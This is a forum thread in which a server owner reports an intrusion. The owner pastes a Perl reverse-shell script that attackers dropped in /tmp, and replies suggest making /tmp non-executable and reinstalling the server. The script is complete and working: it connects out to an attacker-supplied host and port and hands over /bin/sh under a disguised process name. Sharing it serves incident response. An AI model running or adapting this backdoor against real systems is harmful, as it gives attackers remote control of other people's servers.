Hey Guys,

My servers were being hack continously the past few days. The exploiters gain SA access and do the whole channel delete thing. I think I found out how.... kinda...

This is a dedicated server I am running. Somehow they are writing to the /tmp folder (CentOS) two files. I believe its probably some PHP exploit through one of my Nuke sites. The files they place are one perl script named "back" the other an executable binary named "shbd".

Script "back"

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);




file shbd -shbd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.0, dynamically linked (uses shared libs), not stripped

Thats all for now till I find out more. I do not want to post the shbd executable, I will wait for an admin to request it.

MOOXE

To fix this I have made my /tmp folder secure. No user can run executables anymore within /tmp.

This security feature is very useful to ANY unix server out there.

You could also change the permissions of the lynx executable so that only root can use it.

Reinstall your Root Server, as its security has been compromised. Not allowing executing of programmes on /tmp is usually only a small barrier which might prevent the stupidest of script kiddies that cannot even modify their scripts :)
Of course, it wont hurt to configure /tmp non-executable *on the reinstalled root server*.